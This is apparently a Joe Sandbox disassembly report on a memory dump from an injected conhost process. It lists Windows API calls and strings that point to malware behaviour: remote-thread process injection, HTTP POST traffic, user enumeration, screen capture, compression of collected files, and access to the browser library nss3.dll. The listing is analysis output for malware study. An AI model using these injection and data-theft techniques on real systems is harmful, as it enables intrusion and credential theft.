OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 000C2E1C
SetEvent.KERNEL32(00000000), ref: 000C2E29
CloseHandle.KERNEL32(00000000), ref: 000C2E30

Part of subcall function 000C2A32: CloseHandle.KERNEL32(000D2AF0), ref: 000C2AF2

CloseHandle.KERNEL32(000001E6), ref: 000C2E42
ReadProcessMemory.KERNEL32(000000FF,001E0014,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 000C2EA6
Sleep.KERNEL32(000001F4), ref: 000C2EB8
IsWellKnownSid.ADVAPI32(016AF7D0,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 000C2EC9
ReadProcessMemory.KERNEL32(000000FF,001E0014,00000000,00000001,00000000), ref: 000C2EF1
GetFileAttributesExW.KERNEL32({3FF5AE44-1EE1-8646-676C-E42BACAD1769},78F16360,0000000C), ref: 000C2F0D
VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 000C2F50

Part of subcall function 000C97D0: VirtualProtect.KERNEL32(000CCA1A,?,00000040,00000000,001E0014,?,?,000C2F6C,?,?), ref: 000C97E5
Part of subcall function 000C97D0: VirtualProtect.KERNEL32(000CCA1A,?,00000000,00000000,?,?,000C2F6C,?,?), ref: 000C9818

CreateEventW.KERNEL32(000D2C30,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,C:\Users\admin\AppData\Roaming,00000000,?,?,?), ref: 000C2FCE
WaitForSingleObject.KERNEL32(?,000000FF), ref: 000C2FE7
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 000C2FF7
CloseHandle.KERNEL32(0000000C), ref: 000C300D
CloseHandle.KERNEL32(?), ref: 000C3013
CloseHandle.KERNEL32(?), ref: 000C3016

Part of subcall function 000C6B8E: ReleaseMutex.KERNEL32(00000000,000C3021,?,?,?), ref: 000C6B92

Part of subcall function 000CD0E6: LoadLibraryW.KERNEL32(?), ref: 000CD107
Part of subcall function 000CD0E6: GetProcAddress.KERNEL32(00000000,?), ref: 000CD128
Part of subcall function 000CD0E6: SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 000CD159
Part of subcall function 000CD0E6: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 000CD17C
Part of subcall function 000CD0E6: FreeLibrary.KERNEL32(00000000), ref: 000CD1A3
Part of subcall function 000CD0E6: NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 000CD1D9
Part of subcall function 000CD0E6: NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 000CD212
Part of subcall function 000CD0E6: NetApiBufferFree.NETAPI32(?,?,?), ref: 000CD2AB
Part of subcall function 000CD0E6: NetApiBufferFree.NETAPI32(?), ref: 000CD2BE
Part of subcall function 000CD0E6: SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 000CD2E2

Part of subcall function 000C4E20: CharToOemW.USER32(?,?), ref: 000C4E35

Part of subcall function 000C6B9E: OpenMutexW.KERNEL32(00100000,00000000,00000000,000C2E87,?,19367401,?,00000001,8889347B,00000002), ref: 000C6BA9
Part of subcall function 000C6B9E: CloseHandle.KERNEL32(00000000), ref: 000C6BB4

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Part of subcall function 000C2507: CreateMutexW.KERNEL32(000D2C30,00000000,?,?,?,?,?), ref: 000C2528

Part of subcall function 000CCCCF: StrCmpNIW.SHLWAPI(C:\Users\admin\AppData\Roaming,016AF800,00000000), ref: 000CCD57
Part of subcall function 000CCCCF: lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 000CCD6F

Strings

{3FF5AE44-1EE1-8646-676C-E42BACAD1769}, xrefs: 000C2F08
, xrefs: 000C2DD7
C:\Users\admin\AppData\Roaming, xrefs: 000C2F35, 000C2F6C, 000C2F94

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000BDD09, Relevance: 25.7, APIs: 17, Instructions: 205

APIs

TlsAlloc.KERNEL32(000D2868,00000000,0000018C,00000000,00000000), ref: 000BDD22
RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 000BDD4A
CreateEventW.KERNEL32(000D2C30,00000001,00000000,?,84889912,?,00000001), ref: 000BDD74
CreateMutexW.KERNEL32(000D2C30,00000000,?,18782822,?,00000001), ref: 000BDD97
CreateFileMappingW.KERNEL32(00000000,000D2C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 000BDDC2
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 000BDDD8
GetDC.USER32(00000000), ref: 000BDDF5
GetDeviceCaps.GDI32(00000000,00000008), ref: 000BDE15
GetDeviceCaps.GDI32(?,0000000A), ref: 000BDE1F
CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 000BDE32

Part of subcall function 000C9959: GetDIBits.GDI32(00000000,000BDE4B,00000000,00000001,00000000,00000000,00000000), ref: 000C9991
Part of subcall function 000C9959: GetDIBits.GDI32(00000000,000BDE4B,00000000,00000001,00000000,00000000,00000000), ref: 000C99A7
Part of subcall function 000C9959: DeleteObject.GDI32(000BDE4B), ref: 000C99B4
Part of subcall function 000C9959: CreateDIBSection.GDI32(00000000,00000000,00000000,000D2888,?,?), ref: 000C9A24
Part of subcall function 000C9959: DeleteObject.GDI32(000BDE4B), ref: 000C9A43

ReleaseDC.USER32(00000000,?), ref: 000BDE56

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

CreateMutexW.KERNEL32(000D2C30,00000000,?,1898B122,?,00000001,000D28B8,?,00000102,000D28A4,000D2E70,00000010,?,?), ref: 000BDF00
GetDC.USER32(00000000), ref: 000BDF15
CreateCompatibleDC.GDI32(00000000), ref: 000BDF23
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 000BDF3A
SelectObject.GDI32(00000000,00000000), ref: 000BDF4D
ReleaseDC.USER32(00000000,00000001), ref: 000BDF65

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C1A04, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 182

APIs

Part of subcall function 000C7E19: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 000C7E48

InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 000C1A36
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000C1A57
HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 000C1AA6
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 000C1AFD

Part of subcall function 000C338B: HeapAlloc.KERNEL32(00000008,-00000004,000C4B59,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C339C

HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 000C1B75
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 000C1B98
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 000C1BC0

Part of subcall function 000C54F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 000C5505
Part of subcall function 000C54F1: GetLastError.KERNEL32 ref: 000C550F
Part of subcall function 000C54F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 000C552F

InternetCloseHandle.WININET(00000000), ref: 000C1C05
InternetCloseHandle.WININET(?), ref: 000C1C0F
InternetCloseHandle.WININET(?), ref: 000C1C19

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Strings

HTTP/1.1, xrefs: 000C1A98
GET, xrefs: 000C1A76, 000C1AA1
POST, xrefs: 000C1A6F

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000BE240, Relevance: 22.6, APIs: 15, Instructions: 132

APIs

GetMenu.USER32(?), ref: 000BE26A
GetMenuItemCount.USER32(00000000), ref: 000BE280
GetMenuState.USER32(00000000,00000000,00000400), ref: 000BE298
HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 000BE2A8
MenuItemFromPoint.USER32(?,00000000,?,?), ref: 000BE2CE
GetMenuState.USER32(00000000,00000000,00000400), ref: 000BE2E2
EndMenu.USER32 ref: 000BE2F2
HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 000BE302
GetSubMenu.USER32(00000000,00000000), ref: 000BE326
GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 000BE340
TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 000BE361
GetMenuItemID.USER32(00000000,00000000), ref: 000BE379
SendMessageW.USER32(?,00000111,?,00000000), ref: 000BE392

Part of subcall function 000B54A9: GetWindowInfo.USER32(?,?), ref: 000B5515
Part of subcall function 000B54A9: IntersectRect.USER32(?,?,-00000114), ref: 000B5538
Part of subcall function 000B54A9: IntersectRect.USER32(?,?,-00000114), ref: 000B558E
Part of subcall function 000B54A9: GetDC.USER32(00000000), ref: 000B55D2
Part of subcall function 000B54A9: CreateCompatibleDC.GDI32(00000000), ref: 000B55E3
Part of subcall function 000B54A9: ReleaseDC.USER32(00000000,00000000), ref: 000B55ED
Part of subcall function 000B54A9: SelectObject.GDI32(00000000,?), ref: 000B5602
Part of subcall function 000B54A9: DeleteDC.GDI32(00000000), ref: 000B5610
Part of subcall function 000B54A9: TlsSetValue.KERNEL32(?), ref: 000B565B
Part of subcall function 000B54A9: EqualRect.USER32(?,?), ref: 000B5675
Part of subcall function 000B54A9: SaveDC.GDI32(00000000), ref: 000B5680
Part of subcall function 000B54A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 000B569B
Part of subcall function 000B54A9: SendMessageW.USER32(?,00000085,00000001,00000000), ref: 000B56BB
Part of subcall function 000B54A9: DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 000B56CD
Part of subcall function 000B54A9: RestoreDC.GDI32(00000000,?), ref: 000B56E4
Part of subcall function 000B54A9: SaveDC.GDI32(00000000), ref: 000B5706
Part of subcall function 000B54A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000B571C
Part of subcall function 000B54A9: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 000B5735
Part of subcall function 000B54A9: RestoreDC.GDI32(00000000,?), ref: 000B5743
Part of subcall function 000B54A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000B5756
Part of subcall function 000B54A9: SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 000B5766
Part of subcall function 000B54A9: DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 000B5778
Part of subcall function 000B54A9: TlsSetValue.KERNEL32(00000000), ref: 000B5792
Part of subcall function 000B54A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 000B57B2
Part of subcall function 000B54A9: DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 000B57CE
Part of subcall function 000B54A9: SelectObject.GDI32(00000000,?), ref: 000B57E4
Part of subcall function 000B54A9: DeleteDC.GDI32(00000000), ref: 000B57EB
Part of subcall function 000B54A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 000B5813
Part of subcall function 000B54A9: PrintWindow.USER32(00000008,00000000,00000000), ref: 000B5829

SetKeyboardState.USER32 ref: 000BE3D1
SetEvent.KERNEL32 ref: 000BE3DD

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C70A1, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52

APIs

LoadLibraryA.KERNEL32(cabinet.dll), ref: 000C70B5
GetProcAddress.KERNEL32(00000000,FCICreate,?,?,000C73A4,?,?,00000000,?), ref: 000C70D5
GetProcAddress.KERNEL32(FCIAddFile,?,000C73A4,?,?,00000000,?), ref: 000C70E7
GetProcAddress.KERNEL32(FCIFlushCabinet,?,000C73A4,?,?,00000000,?), ref: 000C70F9
GetProcAddress.KERNEL32(FCIDestroy,?,000C73A4,?,?,00000000,?), ref: 000C710B
HeapCreate.KERNEL32(00000000,00080000,00000000,000C73A4,?,?,00000000,?), ref: 000C7136
FreeLibrary.KERNEL32(000C73A4,?,?,00000000,?), ref: 000C714B

Strings

FCIAddFile, xrefs: 000C70D7
cabinet.dll, xrefs: 000C70B0
FCIDestroy, xrefs: 000C70FB
FCICreate, xrefs: 000C70CF
FCIFlushCabinet, xrefs: 000C70E9

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B50A7, Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 194

APIs

EnterCriticalSection.KERNEL32(000D23AC,0000FDE9,?), ref: 000B515C

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

LeaveCriticalSection.KERNEL32(000D23AC,?,000000FF), ref: 000B51B7
EnterCriticalSection.KERNEL32(000D23AC), ref: 000B51D2
getpeername.WS2_32 ref: 000B527F

Part of subcall function 000C681C: WSAAddressToStringW.WS2_32(?,-0000001D,00000000,?,?), ref: 000C6840

Strings

Z\AV, xrefs: 000B5248
YIST, xrefs: 000B523A
]QPG, xrefs: 000B522A
\[EP, xrefs: 000B50E8
EASV, xrefs: 000B5250
YISQ, xrefs: 000B50EF
OMAV, xrefs: 000B5232

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000CD0E6, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188

APIs

LoadLibraryW.KERNEL32(?), ref: 000CD107
GetProcAddress.KERNEL32(00000000,?), ref: 000CD128
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 000CD159
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 000CD17C
FreeLibrary.KERNEL32(00000000), ref: 000CD1A3
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 000CD1D9
NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 000CD212

Part of subcall function 000B7125: ConvertSidToStringSidW.ADVAPI32(?,?), ref: 000B7138
Part of subcall function 000B7125: PathUnquoteSpacesW.SHLWAPI(?), ref: 000B71A0
Part of subcall function 000B7125: ExpandEnvironmentStringsW.KERNEL32(?,000CD23A,00000104), ref: 000B71AD
Part of subcall function 000B7125: LocalFree.KERNEL32(?,.exe,00000000), ref: 000B71C0

NetApiBufferFree.NETAPI32(?,?,?), ref: 000CD2AB

Part of subcall function 000C8C40: PathCombineW.SHLWAPI(000C1F45,000C1F45,?), ref: 000C8C5F

Part of subcall function 000C89C2: PathSkipRootW.SHLWAPI(?), ref: 000C89CD
Part of subcall function 000C89C2: GetFileAttributesW.KERNEL32(?,?,00000000,000CD261,?,?,?,?,?), ref: 000C89F5
Part of subcall function 000C89C2: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,000CD261,?,?,?,?,?), ref: 000C8A03

Part of subcall function 000CC912: LoadLibraryW.KERNEL32(?), ref: 000CC929
Part of subcall function 000CC912: GetProcAddress.KERNEL32(?,?,.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,000CD2A8), ref: 000CC955
Part of subcall function 000CC912: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000CD2A8,?,?), ref: 000CC96C
Part of subcall function 000CC912: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000CD2A8,?,?), ref: 000CC984
Part of subcall function 000CC912: WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,000CD2A8,?,?,00000000), ref: 000CC9A1
Part of subcall function 000CC912: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,000CD2A8,?,?,00000000), ref: 000CCA0D

NetApiBufferFree.NETAPI32(?), ref: 000CD2BE
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 000CD2E2

Part of subcall function 000C786B: PathAddExtensionW.SHLWAPI(?,00000000), ref: 000C78AC
Part of subcall function 000C786B: GetFileAttributesW.KERNEL32(?,?,?,?,?,00000000), ref: 000C78B9

Strings

.exe, xrefs: 000CD1BB, 000CD267, 000CD2EE

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000CC095, Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 254

APIs

Part of subcall function 000C262D: WaitForSingleObject.KERNEL32(00000000,000B776D), ref: 000C2635

EnterCriticalSection.KERNEL32(000D3FE4), ref: 000CC0BC
LeaveCriticalSection.KERNEL32(000D3FE4), ref: 000CC11A

Part of subcall function 000C1049: EnterCriticalSection.KERNEL32(000D2AC8), ref: 000C1064
Part of subcall function 000C1049: LeaveCriticalSection.KERNEL32(000D2AC8), ref: 000C10E7
Part of subcall function 000C1049: InternetCrackUrlA.WININET(?,?,00000000,?), ref: 000C11B2
Part of subcall function 000C1049: InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 000C13EC

LeaveCriticalSection.KERNEL32(000D3FE4), ref: 000CC161

Part of subcall function 000C835E: StrCmpNIA.SHLWAPI(?,?,?), ref: 000C83B8

Part of subcall function 000C82E2: StrCmpNIA.SHLWAPI(?,?,?), ref: 000C831F

LeaveCriticalSection.KERNEL32(000D3FE4), ref: 000CC2CC
EnterCriticalSection.KERNEL32(000D3FE4), ref: 000CC2EB
LeaveCriticalSection.KERNEL32(000D3FE4), ref: 000CC34D

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

LeaveCriticalSection.KERNEL32(000D3FE4), ref: 000CC376
EnterCriticalSection.KERNEL32(000D3FE4), ref: 000CC395
LeaveCriticalSection.KERNEL32(000D3FE4), ref: 000CC3DD

Strings

Accept-Encoding, xrefs: 000CC1EB
identity, xrefs: 000CC1DF
If-Modified-Since, xrefs: 000CC20F

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C3048, Relevance: 18.1, APIs: 12, Instructions: 138

APIs

Part of subcall function 000C20C4: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 000C2105
Part of subcall function 000C20C4: LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 000C2172
Part of subcall function 000C20C4: GetProcAddress.KERNELBASE(?,?,?,?,00000000), ref: 000C21A7
Part of subcall function 000C20C4: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 000C21DB
Part of subcall function 000C20C4: GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 000C21FA
Part of subcall function 000C20C4: GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 000C220C
Part of subcall function 000C20C4: GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 000C221E
Part of subcall function 000C20C4: GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 000C2230
Part of subcall function 000C20C4: GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 000C2242
Part of subcall function 000C20C4: GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 000C2254
Part of subcall function 000C20C4: HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 000C228D
Part of subcall function 000C20C4: GetProcessHeap.KERNEL32(?,?,00000000), ref: 000C229C
Part of subcall function 000C20C4: InitializeCriticalSection.KERNEL32(000D400C,?,?,00000000), ref: 000C22C9
Part of subcall function 000C20C4: WSAStartup.WS2_32(00000202,?), ref: 000C22DF
Part of subcall function 000C20C4: CreateEventW.KERNEL32(000D2C30,00000001,00000000,00000000,?,?,00000000), ref: 000C2300
Part of subcall function 000C20C4: GetLengthSid.ADVAPI32(00000000,000000FF,000D2C08,?,?,00000000), ref: 000C2335
Part of subcall function 000C20C4: GetCurrentProcessId.KERNEL32(00000000,016AF7D0,00000000,?,?,00000000), ref: 000C2362

SetErrorMode.KERNEL32(00008007,00000000), ref: 000C306F
GetCommandLineW.KERNEL32(?), ref: 000C3079
CommandLineToArgvW.SHELL32(00000000), ref: 000C3080
LocalFree.KERNEL32(00000000), ref: 000C30D5

Part of subcall function 000BE0FB: GetCurrentThreadId.KERNEL32(7718F8FF), ref: 000BE108
Part of subcall function 000BE0FB: GetThreadDesktop.USER32(00000000), ref: 000BE10F
Part of subcall function 000BE0FB: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 000BE128

Part of subcall function 000B5BF6: GetCurrentThread.KERNEL32(00000001,?,?,?,?,?,?,?,?,000C30F6), ref: 000B5C03
Part of subcall function 000B5BF6: SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,000C30F6), ref: 000B5C0A
Part of subcall function 000B5BF6: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,000C30F6), ref: 000B5C1C
Part of subcall function 000B5BF6: SetEvent.KERNEL32(000D2868,?,00000001), ref: 000B5C69
Part of subcall function 000B5BF6: GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 000B5C76

Part of subcall function 000BDF74: DeleteObject.GDI32(00000000), ref: 000BDF87
Part of subcall function 000BDF74: CloseHandle.KERNEL32(00000000), ref: 000BDF97
Part of subcall function 000BDF74: TlsFree.KERNEL32(00000000,00000000,000D2868,00000000,000BE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 000BDFA2
Part of subcall function 000BDF74: CloseHandle.KERNEL32(00000000), ref: 000BDFB0
Part of subcall function 000BDF74: UnmapViewOfFile.KERNEL32(00000000,00000000,000D2868,00000000,000BE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 000BDFBA
Part of subcall function 000BDF74: CloseHandle.KERNEL32(00000000), ref: 000BDFC7
Part of subcall function 000BDF74: SelectObject.GDI32(00000000,00000000), ref: 000BDFE1
Part of subcall function 000BDF74: DeleteObject.GDI32(00000000), ref: 000BDFF2
Part of subcall function 000BDF74: DeleteDC.GDI32(00000000), ref: 000BDFFF
Part of subcall function 000BDF74: CloseHandle.KERNEL32(00000000), ref: 000BE010
Part of subcall function 000BDF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 000BE01F
Part of subcall function 000BDF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 000BE038

Part of subcall function 000C2B08: GetModuleHandleW.KERNEL32(?), ref: 000C2B1F
Part of subcall function 000C2B08: GetProcAddress.KERNEL32(00000000,?), ref: 000C2B41

Part of subcall function 000C2D01: CreateMutexW.KERNEL32(000D2C30,00000001,?,32901130,?,00000001,?), ref: 000C2D91
Part of subcall function 000C2D01: GetLastError.KERNEL32 ref: 000C2DA3
Part of subcall function 000C2D01: CloseHandle.KERNEL32(000001E6), ref: 000C2DBA
Part of subcall function 000C2D01: ExitWindowsEx.USER32(00000014,80000000), ref: 000C2DFD
Part of subcall function 000C2D01: OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 000C2E1C
Part of subcall function 000C2D01: SetEvent.KERNEL32(00000000), ref: 000C2E29
Part of subcall function 000C2D01: CloseHandle.KERNEL32(00000000), ref: 000C2E30
Part of subcall function 000C2D01: CloseHandle.KERNEL32(000001E6), ref: 000C2E42
Part of subcall function 000C2D01: ReadProcessMemory.KERNEL32(000000FF,001E0014,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 000C2EA6
Part of subcall function 000C2D01: Sleep.KERNEL32(000001F4), ref: 000C2EB8
Part of subcall function 000C2D01: IsWellKnownSid.ADVAPI32(016AF7D0,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 000C2EC9
Part of subcall function 000C2D01: ReadProcessMemory.KERNEL32(000000FF,001E0014,00000000,00000001,00000000), ref: 000C2EF1
Part of subcall function 000C2D01: GetFileAttributesExW.KERNEL32({3FF5AE44-1EE1-8646-676C-E42BACAD1769},78F16360,0000000C), ref: 000C2F0D
Part of subcall function 000C2D01: VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 000C2F50
Part of subcall function 000C2D01: CreateEventW.KERNEL32(000D2C30,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,C:\Users\admin\AppData\Roaming,00000000,?,?,?), ref: 000C2FCE
Part of subcall function 000C2D01: WaitForSingleObject.KERNEL32(?,000000FF), ref: 000C2FE7
Part of subcall function 000C2D01: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 000C2FF7
Part of subcall function 000C2D01: CloseHandle.KERNEL32(0000000C), ref: 000C300D
Part of subcall function 000C2D01: CloseHandle.KERNEL32(?), ref: 000C3013
Part of subcall function 000C2D01: CloseHandle.KERNEL32(?), ref: 000C3016

Sleep.KERNEL32(000000FF,?,00000001), ref: 000C312B
ExitProcess.KERNEL32(00000000,00000000), ref: 000C313C
OpenProcess.KERNEL32(0000047A,00000000,?,?,00000000), ref: 000C3157

Part of subcall function 000C2542: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 000C2574
Part of subcall function 000C2542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,000C316D,?,00000000,?,?,00000000), ref: 000C25AB
Part of subcall function 000C2542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,000C316D,?,00000000,?,?,00000000), ref: 000C25CB
Part of subcall function 000C2542: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,000C316D,?,00000000), ref: 000C261A

CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00195903,00000000,00000000,00000000), ref: 000C3185
WaitForSingleObject.KERNEL32(00000000,00002710), ref: 000C3198
CloseHandle.KERNEL32(?), ref: 000C31A1
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,00000000), ref: 000C31B5
CloseHandle.KERNEL32(00000000), ref: 000C31BC

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000BDF74, Relevance: 18.1, APIs: 12, Instructions: 78

APIs

DeleteObject.GDI32(00000000), ref: 000BDF87
CloseHandle.KERNEL32(00000000), ref: 000BDF97
TlsFree.KERNEL32(00000000,00000000,000D2868,00000000,000BE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 000BDFA2
CloseHandle.KERNEL32(00000000), ref: 000BDFB0
UnmapViewOfFile.KERNEL32(00000000,00000000,000D2868,00000000,000BE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 000BDFBA
CloseHandle.KERNEL32(00000000), ref: 000BDFC7
SelectObject.GDI32(00000000,00000000), ref: 000BDFE1
DeleteObject.GDI32(00000000), ref: 000BDFF2
DeleteDC.GDI32(00000000), ref: 000BDFFF
CloseHandle.KERNEL32(00000000), ref: 000BE010
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 000BE01F
PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 000BE038

Part of subcall function 000C4DCA: CloseHandle.KERNEL32(00000000), ref: 000C4DD9
Part of subcall function 000C4DCA: CloseHandle.KERNEL32(00000000), ref: 000C4DE2

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C4CDD, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 000C4CEE
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock,00000000,?), ref: 000C4D0D
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 000C4D19
CreateProcessAsUserW.ADVAPI32(?,00000000,000CC8F5,00000000,00000000,00000000,000CC8F5,000CC8F5,00000000,?,?,?,00000000,00000044), ref: 000C4D8A
CloseHandle.KERNEL32(?), ref: 000C4D9D
CloseHandle.KERNEL32(?), ref: 000C4DA2
FreeLibrary.KERNEL32(?), ref: 000C4DB9

Strings

CreateEnvironmentBlock, xrefs: 000C4D07
DestroyEnvironmentBlock, xrefs: 000C4D0F
userenv.dll, xrefs: 000C4CE6

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000BC103, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 44

APIs

GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,000C20A9), ref: 000BC111
